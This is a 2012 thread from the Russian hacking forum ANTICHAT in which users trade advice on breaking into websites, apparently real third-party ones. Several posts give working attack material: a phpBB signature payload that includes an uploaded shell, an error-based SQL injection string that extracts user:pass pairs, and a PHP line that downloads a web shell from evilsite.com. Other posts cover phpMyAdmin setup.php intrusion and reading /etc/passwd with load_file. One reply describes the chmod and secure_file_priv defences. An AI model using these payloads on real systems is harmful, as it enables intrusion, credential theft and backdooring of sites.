ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

19.05.2012, 16:38
|
|
Guest
Провел на форуме: 5709
|
|
cat1vo, спасибо, но не помогло.
Сообщение от None
1. wget'a возможно нету, или нету прав на диру.
Это я понял, просто спрашивал, что быть 100% увереным.
Сообщение от None
2. Шелл можно загрузить в /tmp а потом его проинклюдить (user_sig='phpbb:include("/tmp/shell.bmp")')
Пробывал уже, не получается (
|
|
|
|

19.05.2012, 16:47
|
|
Guest
Провел на форуме: 9121
|
|
DELITE
|
|
|
|

19.05.2012, 16:51
|
|
Новичок
Провел на форуме: 11937
|
|
to абвгдешка
Код:
Code:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+limit+0,1), FLOOR(RAND(0)*2), 64))
|
|
|

19.05.2012, 16:56
|
|
Новичок
|
|
to bodrich
У Вас не получается, потому как может стоять FreeBSD там нет wget'a там fetch стоит по умолчанию,a лучше делать через file_put_contents("shell.php",file_get_contents("h ttp://evilsite.com/shell.txt"))
Сообщение от None
Пробывал уже, не получается (
Может уже есть там такой файл? И лейте в папку со смайлами!
|
|
|

20.05.2012, 17:14
|
|
Guest
Провел на форуме: 59158
|
|
Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?
|
|
|
|

20.05.2012, 17:32
|
|
Новичок
|
|
Никак!
|
|
|

20.05.2012, 20:26
|
|
Guest
Провел на форуме: 39063
|
|
Товарищи!
Тема: phpmyadmin
имеется доступ к /scripts/setup.php
точнее: версия 2.11.2.2
сплоиты не пашут.
Можно ли что-то сотворить чтобы войти в админку?
спасибо.
PS: на кнопки хоть тыкай, хоть нет: config.inc.php пуст,как добавить нового юзера понятия не имею
|
|
|
|

21.05.2012, 01:23
|
|
Guest
Провел на форуме: 103014
|
|
Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела.
Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись.
Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта.
Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать?
Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта.
Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)
|
|
|
|

21.05.2012, 02:11
|
|
Постоянный
Провел на форуме: 2101094
|
|
Га-Ноцри
если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место
chmod 750, допустим
по поводу мускулного запрета (secure_file_priv) , читай тут
|
|
|

21.05.2012, 02:26
|
|
Guest
Провел на форуме: 103014
|
|
Сообщение от Konqi
Konqi said:
Га-Ноцри
если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место
chmod 750, допустим
по поводу мускулного запрета (secure_file_priv) , читай
тут
Большое спасибо за пояснение. Вопрос исчерпан. Углубился в чтение
|
|
|
|
|
 |
|
|